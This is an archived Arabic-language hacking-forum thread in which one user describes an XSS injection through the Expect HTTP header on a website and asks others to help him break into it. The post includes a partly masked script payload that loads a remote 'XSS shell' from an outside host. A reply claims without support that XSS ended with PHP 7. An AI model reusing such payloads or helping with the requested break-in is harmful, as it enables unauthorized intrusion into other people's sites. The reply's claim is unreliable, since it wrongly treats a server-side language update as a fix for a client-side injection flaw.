:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   XSS headers injection (http://www.vbspiders.com/vb/t73541.html)

123s123 11-07-2016 01:44 PM

XSS headers injection
 
مرحبا اعزائي

وجدت ثغرة XSS Headers Injection
باستخدام tamper data استطيع اضافه Expect وبعدها ممكن اكتب اي كود مثلا
***************("Hello")</script>
ويظهر لي hello

بس المشكله لما حاولت ارفع شل XSS ما رضى يصير
عن طريق الكود
********** src="http://mysite.com/xssshell/xssshell.asp" </script>

ممكن احد يساعدني في اختراق هذا الموقع ؟؟

Alous 02-12-2017 11:53 PM

رد: XSS headers injection
 
يمكن حماية من سرفر الموقع ال xss صار من التاريخ بعد تحديث ال php لل 7


الساعة الآن 12:17 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0